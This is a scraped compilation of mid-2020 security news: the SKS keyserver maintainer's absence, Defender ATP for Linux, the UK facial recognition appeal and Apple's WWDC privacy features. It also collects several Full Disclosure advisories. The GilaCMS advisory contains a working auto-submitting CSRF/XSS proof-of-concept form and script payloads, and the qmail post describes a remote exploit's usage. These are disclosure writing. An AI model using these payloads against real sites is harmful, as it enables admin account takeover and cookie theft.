There was a time when there was a certain amount of pride in the fact internet engineers all knew one another, that systems critical to the internet’s functioning were run in the back of other facilities, and a single person was often in charge of whole services.

Fortunately those times have changed, and global communication networks are now run a little more professionally, with clear points of contact, dedicated rooms and staff, and multiple checks and balances to ensure things run smoothly.

Or so we thought.

“Hi all, Has anyone seen or heard from Kristian in the last month or so?” asked Todd Fleisher earlier this month – in fact, 11 June – on the main mailing list for an important cluster of OpenPGP key servers. “I’ve reached out several times off list about the upcoming expiration of my server’s certificate for the HKPS pool but have not received any response.”

Todd was referring to Kristian Fiskerstrand who has run the SKS keyserver pools, which are relied upon by various applications using OpenPGP for encryption. Fiskerstrand, who had seemingly gone AWOL, issues cryptographic certificates to servers that join the SKS keyserver pools, allowing these volunteer machines to share the load in securely handling key lookup requests. It’s these certs that were in danger of expiring, forcing them out of the collective.

No one knew where Kristian was. Try his Twitter handle, suggested one: but he hadn’t posted there for over a year. What about his Facebook, suggested another with a link? Nope, no activity there, either.

This wasn’t the first time Todd has tried to get Kristian to renew his certs: he had posted a similar message the previous month and heard nothing. Now Todd was getting worried: “My certificate expires in 10 days, at which point I will no longer be able to serve requests for and will have to generate my own certificate so other clients can continue to securely access my server directly,” he warned.

It gets worse

And it went further than that too, Todd noted: “The SKS HKPS certificates of the only other servers in the pool expire in 36 days. If new certificates are not minted by that time the SKS HKPS pool will become defunct. If anyone has other channels by which to reach Kristian, please use them to reach out and make sure he is OK & aware of this impending issue.”

Someone upset about a hashtag

Hash snag: Security shamans shame SHA-1 standard, confirm crucial collisions citing circa $45k chip cost


But nobody could track Kristian down and no responses were forthcoming. Ten days later, and presumably having tried numerous other ways to get hold of the man running the keyserver pools, a resigned Todd posted back to the list.

“The certificate has now expired and been replaced with a standard SSL certificate from Let’s Encrypt. As such, it will no longer be able to field requests… 25 days until Dan Austin’s certificates expire on the remaining nodes in the pool.”

This is seemingly not the first time there have been issues with the widely used keyserver pool.

A year ago last week, a new OpenPGP keyserver was launched at to “to provide an alternative to the SKS Keyserver pool,” which its founders noted had “been struggling with abuse, performance, as well as privacy issues, and more recently also GDPR compliance questions.”

It was a community effort led by three OpenPGP advocates providing secure email and certificate services. As they noted at the time: “Kristian Fiskerstrand has done a stellar job maintaining the pool for more than ten years, but at this point development activity seems to have mostly ceased. We thought it time to consider a fresh approach to solve these problems.”

Fresh approach indeed. Because if there one thing that internet engineers have learned since the days of Jon Postel, it’s that leaving your infrastructure in the hands of a single person, no matter how well meaning, is rarely a good idea.


There are countless examples of how administrators and maintainers accidentally created havoc by losing emails, forgetting deadlines, going on holiday, or falling sick. There’s even the case of one sysadmin in charge of an entire country’s top-level domain disappeared and left the entire system in limbo.

It was 2002 and Afghanistan: Abdul Razeeq, administrator of .af, could not be reached. Some suspected he had been killed during the bombing of Kabul by US armed forces days earlier. But, fortunately for everyone, Razeeq popped up just in time to sign over .af to the US interim administration before never being heard from again.

You can still see the one paragraph letter [PDF] he signed handing over the top-level domain. A letter that is not in any way suspicious and was definitely signed by Abdul Razeeq, no doubt about it.

Had the same fate befallen SKS’ Kristian Fiskerstrand?

No. Because the day after Todd’s certificates expired – today, Tuesday, in fact – up popped Fiskerstrand. “I’m around here,” he informed the mailing list, “Just focusing on everything else than computers lately, sorry about that (but it has really been nice..) Will get around to issuing a new certificate for you (Todd) later today or tomorrow.”

Yeah, thanks for everything, Kristian; it’s time to move to ®

Sponsored: Ransomware has gone nuclear

Follow me for more information.

Microsoft has extended its antivirus package for servers – better known the Defender Advanced Threat Protection (ATP) for servers suite – to Linux as a general availability release.

Redmond said today that the ATP-for-Linux port will run directly on Red Hat Enterprise Linux, CentOS, Ubuntu, SUSE Linux Enterprise Server, Debian, and Oracle Linux. Other distros can run the software via fine-tuning with Puppet or Ansible.

We’re told ATP-for-Linux is able to scan for malware, and provide basic information on what possible threats were found and removed. More importantly for admins, it can be controlled through the Microsoft Defender Security Center alongside Windows Server boxen and fleets of PCs.

Mind you, this isn’t something Microsoft expects to help it break into organizations exclusively using Linux. Rather, it’s a way to help IT admins with a bunch of Windows Server and Linux machines set up an anti-malware suite consistently across their offices, racks, and data centers, managed from a central control panel. “Microsoft Defender ATP for Linux requires the Microsoft Defender ATP for Servers license,” Redmond reminds us.

“Adding Linux into the existing selection of natively supported platforms by Microsoft Defender ATP marks an important moment for all our customers,” Helen Allas, a principal program manager at the Windows giant, continued.

Brad Smith

Everything OK with Microsoft? Windows giant admits it was ‘on the wrong side of history’ with regard to open source


“It makes Microsoft Defender Security Center a truly unified surface for monitoring and managing security of the full spectrum of desktop and server platforms that are common across enterprise environments.”

It is also part of a larger effort by Redmond to extend Defender ATP from a Microsoft-exclusive operation into a multi-platform security suite in its own right. In addition to last year’s macOS port and today’s official launch for Linux, Microsoft has announced plans to bring the tool to Android devices (that release just went into public preview).

“Microsoft Defender ATP for Android will offer protection against phishing and unsafe network connections from apps, websites, and malicious apps,” Kanishka Srivastava, a senior program manager at Microsoft, said of the new Android offering.

“In addition, the ability to restrict access to corporate data from devices that are deemed ‘risky’ will enable enterprises to secure users and data on their Android devices.” ®

Sponsored: Webcast: Simplify data protection on AWS

Follow me for more information.

In addition, the first release of Defender ATP for Linux is now generally available.

Microsoft today released a preview of the Microsoft Defender ATP version for Android mobile devices and rolled out its first production version of the tool for Linux systems.

The Defender ATP security tool includes phishing protection and scanning of applications and files for malware. It works with Microsoft’s Endpoint Manager and Conditional Access products.

“In this rapidly evolving world of mobile threats, Microsoft is taking a holistic approach to tackling these challenges and to securing enterprises and their data with our new mobile threat defense capabilities,” wrote Rob Lefferts, corporate vice president of Microsoft 365 Security, in a blog post today. “We’re leveraging our unique visibility into the threat landscape and the vast signal, intelligence, and security expertise we have from across domains, such as our expertise in phishing and email, our endpoint threat research on malware and attacker techniques, and our focus on identity and zero trust to bring protection capabilities to mobile.”

The Linux version of Microsoft’s software represents yet another move by the company to extend its tools beyond its Windows-based platforms.

“This release marks an important moment for all Microsoft Defender ATP customers when Microsoft Defender ATP becomes a truly unified solution to secure the full spectrum of desktop and server platforms that are common across enterprise environments: Windows, macOS, and Linux,” Lefferts said.

Read more here and here

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database CVE-2020-15047
PUBLISHED: 2020-06-25

MSA/SMTP.cpp in Trojita before 0.8 ignores certificate-verification errors, which allows man-in-the-middle attackers to spoof SMTP servers.

PUBLISHED: 2020-06-25

net-snmp before 5.8.1.pre1 has a double free in usm_free_usmStateReference in snmplib/snmpusm.c via an SNMPv3 GetBulk request. NOTE: this affects net-snmp packages shipped to end users by multiple Linux distributions, but might not affect an upstream release.

PUBLISHED: 2020-06-25

NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the Inter Process Communication APIs, in which improper access control may lead to code execution, denial of service, or information disclosure.

PUBLISHED: 2020-06-25

NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the service host component, in which the application resources integrity check may be missed. Such an attack may lead to code execution, denial of service or information disclosure.

PUBLISHED: 2020-06-25

NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the DirectX 11 user mode driver (nvwgf2um/x.dll), in which a specially crafted shader can cause an out of bounds access, leading to denial of service.

Follow me for more information.

fulldisclosure logo Full Disclosure mailing list archives

  By Date           By Thread        

DLL Hijacking at the Trend Micro Password Manager (CVE-2020–8469)

From: Silton Renato Pereira dos Santos <silton.santos () tempest com br>
Date: Tue, 23 Jun 2020 14:50:43 -0300

=====[ Tempest Security Intelligence - 2020]========================== Trend Password Manager
Author: Silton Santos
Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of
Contents]===================================================== * Vulnerability Information
* Overview
* Detailed description
* Thanks & Acknowledgements
* References =====[ Vulnerability
Information]============================================= * Class: Uncontrolled Search Path Element [CWE-427][1]
* CVSSv3 Score: 7.3
* CVE-2020-8469 =====[
Overview]============================================================== * System affected : Trend Micro Password Manager Version 5.0[2]
* Impact : An user could obtain SYSTEM privileges. =====[ Detailed
description]================================================== A DLL hijacking vulnerabilty in Trend Micro Password Manager 5.0 on Windows
could potentially allow an attacker privileged escalation. more details: =====[ Thanks &
Acknowledgements]============================================ - Tempest Security Intelligence [3] =====[ References
]=========================================================== [1] [2] [3] =====[ EOF
]==================================================================== _______________________________________________
Sent through the Full Disclosure mailing list
Web Archives & RSS: 

  By Date           By Thread  

Current thread:

  • DLL Hijacking at the Trend Micro Password Manager (CVE-2020–8469) Silton Renato Pereira dos Santos (Jun 23)

Follow me for more information.

fulldisclosure logo Full Disclosure mailing list archives

GilaCMS – CVE-2019-13364 CVE-2019-13363

From: Rodolfo Augusto do Nascimento Tavares <rodolfo.tavares () tempest com br>
Date: Tue, 23 Jun 2020 15:27:43 -0300

=====[ Tempest Security Intelligence - ADV-07/2020
]========================== GilaCMS - Version 1.11.5 Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents]================================================== * Overview * Detailed description * Timeline of disclosure * Thanks & Acknowledgements * References =====[ Vulnerability
Information]============================================= * Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Cross-Site Request Forgery (CSRF) [CWE-352] * CVSS:6.8.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H * CVE-2019-20804, CVE-2019-20803 =====[ Overview]======================================================== * System affected : GilaCMS - Version 1.11.5 * Software Version : Version 1.11.5 (other versions may also be affected). * Impacts : * XSS: Gila CMS before 1.11.6 is vulnerable to reflected XSS via the
admin/content/postcategory in the id parameter, which is mishandled by
g_preview_them. * XSS and CSRF: Gila CMS before 1.11.6 allows for CSRF resulting in XSS
via the admin/themes URI, leading to full compromise of the admin account. =====[ Detailed
description]================================================= 1- XSS at [|*]
id parameter: To exploit the XSS via GET in the endpoint *cm/edit_form/postcategory* and
parameter *id*, just insert a double quotes character (") to escape the
string the, close the current by adding a ">" then include a javascript
payload. Follows an example: * [ "><script>alert(1)</script>] 2- CSRF and XSS at admin/themes: The following HTML code exploits both XSS and CSRF vulnerabilities. The
admin/themes form is vulnerable to CSRF due to the lack of anti-CSRF
tokens, and to XSS due to no proper validations of its inputs. To exploit
these vulnerabilities, an attacker should host the following form and trick
the administrator into visit this page. <html> <body> <script>history.pushState('', '', '/') </script>
<form action="";
method="POST" enctype="multipart/form-data">
<input type="hidden" name="option[color]" value="#e91428" />
<input type="hidden" name="option[header-title]" value="Test" /> <input type="hidden" name="option[header-text]"
value=""><script>alert(document.cookie)</script><!--" /> <input type="hidden" name="option[header-image]" value="" /> <input type="hidden" name="option[about-title]"
value="<script>alert(0)<script>" /> <input type="hidden" name="option[about-text]"
value="<script>alert(3)<script>" /> <input type="hidden" name="option[service-category]" value="1" /> <input type="hidden" name="option[project-category]"value="1" /> <input type="hidden"
name="option[contact-title]"value="<script>alert(4)<script>" /> <input type="hidden" name="option[contact-text]"
value="<script>alert(5)<script>" /> <input type="hidden" name="option[contact-email]"
value="<script>alert(6)<script>" /> <input type="hidden" name="option[contact-phone]"
value="<script>alert(7)<script>" /> <input type="submit" value="Submit request" /></form> <script> document.forms[0].submit(); </script> </body> </html> =====[ Timeline of
disclosure]=============================================== 29/Oct/2019 - Responsible disclosure was initiated with the vendor.
02/Nov/2019 - GilaCms confirmed the issue;
07/Nov/2019 - The vendor fixed the vulnerability CSRF.
07/Nov/2019 - The vendor fixed the vulnerability XSS.
22/May/2020 - CVEs was assigned and reserved as CVE-2019-13364
CVE-2019-13363 =====[ Thanks & Acknowledgements]======================================== * Tempest Security Intelligence [5] =====[ References ]===================================================== [1][ []|
[2][ []|
[3][ []]
[4][ []]
[5][ [|]|] =====[ EOF ]===========================================================

Attachment: adv-gila.txt

Sent through the Full Disclosure mailing list
Web Archives & RSS:

  By Date           By Thread  

Current thread:

  • GilaCMS – CVE-2019-13364 CVE-2019-13363 Rodolfo Augusto do Nascimento Tavares (Jun 23)

Follow me for more information.

Feeling a bit uncertain about things? Never fear, kind old Microsoft has made Safe Documents generally available (assuming you’re a Microsoft 365 E5 subscriber).

Aimed at enterprise users, the feature improves on the Protected View with which users of Office apps are all too familiar. Protected View is supposed to keep users safe by opening documents in read-only mode, thereby ensuring that any nasties lurking within cannot wreak havoc by leaping out of the sandbox and into a user’s setup.

Protected View tends to be triggered when a document comes from somewhere unsafe, such as the internet or from an untrustworthy email sender. It is, in theory, a good thing. However, it can also be a bit of a pain, and all too many users eagerly take the option to edit and print regardless, thus potentially exposing an organisation to harm and undoing all the IT team’s hard work securing things.

Enter Safe Documents. Once enabled, an extra layer of security is added which sends the document through Microsoft Defender ATP for scanning before allowing it to be edited.

The scanner allows for a maximum upload size of 60MB, and things can be derailed if timeouts of network connectivity occur (potentially allowing the user to hit the edit button, although the Protected View does urge caution).

If all goes well, then the user may edit the document as normal. However, if the scan detects that something is amiss, then the Protected View bar turns an angry red and the user informed that what they thought was a letter from a wealthy prince was actually something a little more malicious.

It is up to administrators to decide if users should be able to skip through the alerts and jump straight to editing. Admins can also use the Kusto-based Advanced Hunting tools to retrieve additional information.

It’s off by default, and enabling it (and doubtless triggering a wave of calls to the helpdesk) is a simple matter of checking a box in the Security & Compliance Center.

Sadly, it is currently only possible to protect those with Microsoft 365 E5 or a Microsoft 365 E5 Security licence from themselves at present, and only those running in Window clients. ®

Sponsored: Webcast: Simplify data protection on AWS

Follow me for more information.

fulldisclosure logo Full Disclosure mailing list archives

Keystone Assembler Engine 0.9.2 is out!

From: Nguyen Anh Quynh <aquynh () gmail com>
Date: Sun, 21 Jun 2020 22:24:42 +0800

Greetings, We are very happy to announce a stable release, version 0.9.2, of
Keystone Assembler Engine! This version fixes some important bugs inside the core of Keystone,
added some new bindings, and made various improvements, without
breaking compatibility. All users of Keystone are encouraged to
upgrade to v0.9.2. Find more information on this release at (In case you do not know, Keystone is an open source framework of
assemblers, which support multi-architecture, multi-platform &
multi-binding) Thanks,
Quynh _______________________________________________
Sent through the Full Disclosure mailing list
Web Archives & RSS: 

  By Date           By Thread  

Current thread:

  • Keystone Assembler Engine 0.9.2 is out! Nguyen Anh Quynh (Jun 23)

Follow me for more information.

fulldisclosure logo Full Disclosure mailing list archives

Re: Remote Code Execution in qmail (CVE-2005-1513)

From: Qualys Security Advisory <qsa () qualys com>
Date: Tue, 16 Jun 2020 14:30:13 -0700

Hi all, Our Linux exploit for CVE-2005-1513 in qmail is attached to this email.
Alternatively, it will be available at: A few notes about this exploit: - It works as-is against a default, unpatched installation of qmail on Debian 10 (amd64). It requires roughly 4GB of disk space and 8GB of memory on the target machine, and creates a file in /tmp when successful. - It can be ported to other Linux distributions (if the qmail-local binary is not full-RELRO) by modifying the lines marked with XXX in the exploit code. - To obtain the mmap layout described in our advisory, the exploit simulates the qmail-local program, and must therefore be executed on the same type of Linux distribution as the target. For example, in our tests, we executed the exploit on a Debian 10.0 machine and remotely attacked a Debian 10.3 machine. The exploit parameters can probably be calculated without the qmail-local simulation, and can certainly be precalculated, but we wanted to keep our exploit as general as possible. For the local exploit (LPE), there are only two command-line arguments: - "user": the name of the target user (on a default Debian installation, this can be "man", "root", "avahi-autoipd", or any real user account). - "domain": by default, the hostname in "/var/lib/qmail/control/me". For the command line of the remote exploit (RCE), there are three
mandatory options, three arguments, and one optional option: - "-i client_ip": the IP address of the attacking machine, as seen by the target machine. - "-h client_host": the hostname of the attacking machine (if it has no reverse DNS, the empty string can be specified, and the exploit will use qmail's default, "unknown"). - "-s server_host": the hostname of the target machine (by default, the same as the "domain" below). - "user": the name of the target user. - "domain": by default, the hostname in "/var/lib/qmail/control/me" on the target machine (and hence the hostname in qmail's SMTP banner). - "server_ip": the IP address of the target machine. - "-d homedir": the home directory of the target user, if known (otherwise, the exploit uses a reasonable default). We are at your disposal for questions, comments, and further
discussions. Thank you very much! With best regards, --
the Qualys Security Advisory team []<> This message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (“spam”). If you have any concerns about this process, please contact us.

Attachment: CVE-2005-1513.tar.gz

Sent through the Full Disclosure mailing list
Web Archives & RSS:

  By Date           By Thread  

Current thread:

  • Re: Remote Code Execution in qmail (CVE-2005-1513) Qualys Security Advisory (Jun 23)

Follow me for more information.

fulldisclosure logo Full Disclosure mailing list archives

[SYSS_2020-014]: ABUS Secvest Wireless Control Device (FUBE50001) – Missing Encryption of Sensitive Data (CWE-311) (CVE-2020-14157)

From: Matthias Deeg <matthias.deeg () syss de>
Date: Wed, 17 Jun 2020 13:18:10 +0200

Advisory ID: SYSS-2020-014
Product: ABUS Secvest Wireless Control Device (FUBE50001)
Manufacturer: ABUS
Affected Version(s): N/A
Tested Version(s): N/A
Vulnerability Type: Missing Encryption of Sensitive Data (CWE-311)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2020-04-03
Solution Date: -
Public Disclosure: 2020-06-17
CVE Reference: CVE-2020-14157
Authors of Advisory: Michael Rüttgers, Thomas Detert, Matthias Deeg (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: ABUS Secvest Wireless Control Device (FUBE50001) is a wireless control
panel for the ABUS Secvest wireless alarm system. Some of the device features as described by the manufacturer are
(see [1]): "
* Easy operation via code or proximity keyfob The Secvest wireless control panel is an optional Secvest accessory. Every wireless control panel can be operated from your system via PIN code. It is possible to arm and disarm the panel via proximity keyfob. * Flexible use in entrance areas Up to 8 control panels can be integrated into the alarm system. These additional modules can be placed in various areas of the building. This provides added convenience for you, because Secvest can be armed and disarmed directly on the wireless control panel, without the need to go back to the central alarm panel every time. In addition to internal arming or arming individual sub-areas, you can also switch a single output, such as the garage door, if desired. * Secure wireless communication Thanks to a secure wireless communication procedure, this product is protected against ‘replay attacks’, as are the Secvest wireless alarm system and Secvest Touch alarm systems. This procedure for preventing third-party tampering exceeds the requirements of the “DIN EN 50131-1 level 2” security standard. " Due to the missing encryption of the wireless communication, an attacker
is able to eavesdrop sensitive data as cleartext, for instance, used PINs
or proximity token IDs. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Michael Rüttgers found out that the wireless communication of the ABUS
Secvest Wireless Control Device (FUBE50001) for transmitting sensitive
data like PIN codes or IDs of used proximity chip keys (RFID tokens) is
not encrypted. This security issue is related to the insecure wireless transmission of
sensitive data of the ABUS Secvest remote controls FUBE50014 and
FUBE50015 reported back in 2018 (see SySS security advisory
SYSS-2018-035 [2]). Thus, an attacker observing radio signals of an ABUS FUBE50001
wireless control panel is able to see all sensitive data of transmitted
packets as cleartext and can analyze the used packet format and the
communication protocol. For instance, this security issue could successfully be exploited to
sniff used PIN codes and used proximity chip key IDs. By knowing the correct PIN code or the ID of a valid ABUS Secvest
proximity chip key, an attacker is able to disarm the wireless alarm
system in an unauthorized way. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Michael Rüttgers, Thomas Detert, and Matthias Deeg developed different
PoC software tools, either for the RFCat-based radio dongle YARD Stick
One [3] in one version, or the GreatFet One neighbor Erica [4] in another
one, that allowed sniffing out used PIN codes or used proximity chip key
IDs when eavesdropping on the FUBE50001 wireless communication. The following output exemplarily shows a successful PIN code sniffing
attack: $ python2
ABUS Secvest FUBE50001 PIN Code Sniffer PoC - SySS GmbH (c) 2020
by Thomas Detert, Michael Rüttgers, and Matthias Deeg
[*] Listening for ABUS FUBE50001 packets ...
[*] Received packet:
[*] Decoded packet : da0a077ed5c549888800626b
[*] Received packet:
[*] Decoded packet : da86937707e4884040a0c8ecff005e1fb9
[*] Detected FUBE50001 packet with FUBE50001 PIN
[+] Sniffed PIN code: 1337
(...) An example of a successful sniffing attack regarding the ID of an ABUS
proximity chip key is illustrated in the following output: $ python2
ABUS Secvest FUBE50001 Proximity Chip Key ID Sniffer PoC - SySS GmbH (c)
by Thomas Detert, Michael Rüttgers, and Matthias Deeg
[*] Listening for ABUS FUBE50001 packets ...
[*] Received packet:
[*] Decoded packet: da81937707e488404018b9165b475f3c46
[*] Detected FUBE50001 packet with proximity token ID
[+] Sniffed proximity chip key ID: 3805964445
(...) The described sniffing attacks are also demonstrated in the SySS
Proof-of-Concept Video titled "ABUS Secvest Sniffing Attack" which is
available on the SySS YouTube Channel [8]. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: SySS GmbH is not aware of a solution for this reported security
vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-04-03: Vulnerability reported to manufacturer
2020-06-17: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for ABUS Secvest wireless control device
[2] SySS Security Advisory SYSS-2018-035
[3] Product website YARD Stick One
[4] GreatFET One neighbor Erica targeting the 315/433/868/915 MHz
freqency bands
[5] GreatFET wiki
[6] SySS Security Advisory SYSS-2020-014
[7] SySS GmbH, SySS Responsible Disclosure Policy
[8] SySS Proof of Concept Video: ABUS Secvest Sniffing Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Michael Rüttgers and Thomas
Detert. Mr. Rüttgers and Mr. Detert reported this finding to SySS GmbH where it
was verified and later reported to the manufacturer by Matthias Deeg. E-Mail: matthias.deeg (at)
Public Key:
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0

Attachment: signature.asc
Description: OpenPGP digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS:

  By Date           By Thread  

Current thread:

  • [SYSS_2020-014]: ABUS Secvest Wireless Control Device (FUBE50001) – Missing Encryption of Sensitive Data (CWE-311) (CVE-2020-14157) Matthias Deeg (Jun 23)

Follow me for more information.

Automated facial recognition (AFR) use by British police forces breaches human rights laws, according to lawyers for a man whose face was scanned by the creepycam tech in Cardiff.

“Put simply, connected to a database with the right information, AFR could be used to identify very large numbers of people in a given place at a given time,” Dan Squires QC told the Court of Appeal of England and Wales in written arguments this morning.

Squires is barrister for one Ed Bridges, who, backed by human rights pressure group Liberty, wants to overturn a judicial review ruling from 2019 which failed to halt facial recognition tech use against him by South Wales Police.

The force had set up cameras on the city’s iconic central Queen Street in June 2017 to coincide with the UEFA Champions League Final and outside a defence technology expo the following year.

The Divisional Court in the Welsh capital of Cardiff said it was satisfied police were complying with the Human Rights Act as well as “the data protection legislation”, a ruling Bridges and Liberty now hope to overturn.

“Essentially the use of AFR is analogous to taking the fingerprints or DNA of thousands of persons (if it could be done without their knowledge, cooperation or consent) and instantaneously comparing such biometric data to that of persons whose location is being sought,” continued Bridges in written submissions. He argued that the tech breaches Article 8 of the Human Rights Act, the right to privacy.

Bridges was questioned repeatedly by all three Court of Appeal judges on his legal arguments, with the judges sometimes asking whether they had understood what he was saying. Lord Justice Singh told the barrister at one point: “I thought you were making a different point [in your written arguments]… I had understood, maybe wrongly, you did complain about the original equality assessment and the only thing you should be on the lookout for is direct discrimination.”

Originally Bridges had said that an equality impact assessment of AFR done by South Wales Police was not enough to satisfy its public sector equality duty. Addressing the judges, he replied: “You see, when we look at the impact assessment we see that it only looks at direct discrimination,” explaining that indirect racial or sexual discrimination – two important parts of the public sector equality duty – therefore could not have been covered.

The case, due to continue over the next few days, sees three of Britain’s most senior civil judges hearing from Liberty, South Wales Police, the Home Office, the Information Commissioner’s Office, the Surveillance Camera Commissioner and the Police and Crime Commissioner for South Wales.

The case continues. None of the various sides are seeking legal costs against the others. ®


The hearing began as a YouTube livestream which rapidly collapsed into chaos, with Sir Terence Etherton – president of the Court of Appeal – phoning judicial tech support for help only to be put through to O2 voicemail. Red-faced court admins quickly deleted the saved livestream from YouTube while the court went on hiatus for half an hour. It eventually abandoned YouTube and switched to a Skype-only hearing.

Sponsored: Ransomware has gone nuclear

Follow me for more information.

macos ios

Unprecedented times call for unprecedented measures.

No, we’re not talking about ‘coronavirus,’ the current global pandemic because of which Apple—for the very first time in history—organized its Worldwide Developer Conference (WWDC) virtually.

Here we’re talking about a world in which we are all connected and constantly sharing data, also known as the new oil, with something called “privacy” for which we still have to fight on several fronts together.

During WWDC 2020 on Monday, the world’s most valuable company announced the next versions of its operating systems — iOS 14 for iPhones, iPadOS 14 for iPads, watchOS 7 for Apple Watches, and macOS Big Sur for MacBooks — with new features and enhancements.

What’s important is that the company also highlighted a few new security and privacy features that have been added to the upcoming iOS 14 and macOS Big Sur systems, categorically aiming to help users:

  • better control which apps installed on their devices can access their data,
  • identify shady apps that don’t respect privacy, and share data with others without any disclosure,
  • spot malicious apps that secretly spy on users’ data and activities.

“Privacy is a fundamental human right and at the core of everything we do. That’s why with iOS 14, we’re giving you more control over the data you share and more transparency into how it’s used,” the company says in a statement.

New Security and Privacy Features in macOS and iOS

Below we have summarized some of the new important privacy and security features that are really worth knowing:

1.) Not Every App Can Access Your Precise Geo location

iphone location tracking app

Your iPhone already allows you to block specific apps from tracking your location, but now the latest iOS version will also allow you to share an approximate location with apps you are using instead of giving them access to your precise geolocation coordinates when granting any app location access.

2.) An Indicator to Spot if Microphone/Camera is Recording

iPhone users will now see a yellow dot indicator in the status bar whenever their microphone or camera is recording.

iphone camera tracking

In the Control Center, you can see which apps have used the mic or camera recently.

3.) Upgrade App Account to “Sign-in with Apple”

iphone sign in with apple id

Developers can now offer the option to upgrade existing app accounts to Sign in with Apple so users can enjoy improved Privacy, security, and ease of use without setting up a new account.

4.) Limited Photos Library Access for Selected App

With iOS 14, you do not need to share your entire photo library with apps with whom you want to share a few photos.

You can now choose to share only selected items with an app that asks access to your photos, or granting access is essential to use a related functionality.

5.) Safari Browser Added Password Monitoring and Privacy Report

Apple added two new security features to its Safari web browser for iOS and macOS, one of which aims to help users learn if they are using a compromised password for any online account.

safari privacy settings

“Safari automatically keeps an eye out for any saved passwords that may have been involved in a data breach. Using advanced cryptographic techniques, Safari periodically checks a derivation of your passwords against an updated list of compromised credentials. If a breach is discovered, Safari helps you upgrade your existing passwords. All this is done without revealing your password information to anyone — including Apple,” the company said.

Whereas the second feature in Safari uses Intelligent Tracking Prevention to identify and prevent trackers from profiling or following you across the web.

Besides this, the system also generates a weekly Privacy Report, showing users how Safari protects their browsing across all the websites they visit.

6.) Cross-App Tracking: Control and Transparency

To make tracking transparent and under the user’s control, Apple now requires app developers to get users’ consent before tracking them across third-party applications and websites.

This means now you can choose which apps have permission to track you.

You can see which apps you have given permission to track in settings, letting you change your preferences accordingly.

7.) Privacy Information on the App Store

Apple now also requires developers to display a summary of the privacy practices of their apps on their pages in the App Store, which will help users review it before downloading.

apple app store privacy

They are required to self-report their app practices, like data collected by the developer, and used to track you across companies in a simple, easy-to-read format.

8.) Bye, Bye, Intel! Apple to Use ARM-based Processors in Mac Devices

Besides announcing new features and improvements for iOS and macOS, Apple also made a big announcement at WWDC 2020 — the company is officially switching from Intel processors to its in-house “Apple Silicon” processors.

apple silicone processor

After creating mobile processors for its iPhone and iPad devices from over a decade, Apple is eager to bring Apple-designed silicon for the Mac, which will maximize the performance of the device while also being energy efficient.

“With its powerful features and industry-leading performance, Apple silicon will make the Mac stronger and more capable than ever,” said Apple CEO Tim Cook. “I’ve never been more excited about the future of the Mac.”

The company plans to ship the first Mac with Apple silicon by the end of this year and complete the transition in about two years.

To help developers get started with Apple silicon, Apple is launching the Universal App Quick Start Program, which provides access to documentation, forums support, beta versions of macOS Big Sur and Xcode 12, and the limited use of a Developer Transition Kit (DTK), a Mac development system based on Apple’s A12Z Bionic System on a Chip (SoC).

Follow me for more information.


VirusTotal, the famous multi-antivirus scanning service owned by Google, recently announced new threat detection capabilities it added with the help of an Israeli cybersecurity firm.

VirusTotal provides a free online service that analyzes suspicious files and URLs to detect malware and automatically shares them with the security community. With the onslaught of new malware types and samples, researchers rely on the rapid discovery and sharing provided by VirusTotal to keep their companies safe from attacks.

VirusTotal relies on a continuous stream of new malware discoveries to protect its members from significant damage.

Cynet, the creator of the autonomous breach protection platform, has now integrated its Cynet Detection Engine into VirusTotal.

The benefits of this partnership are twofold. First, Cynet provides the VirusTotal partner network cutting-edge threat intelligence from its ML-based detection engine (CyAI) that actively protects the company’s clients around the globe.

CyAI is a continuously learning and evolving detection model that routinely contributes information about new threats that are not available in VirusTotal. Although many vendors are using AI/ML models, the ability of the models to detect new threats vary greatly.

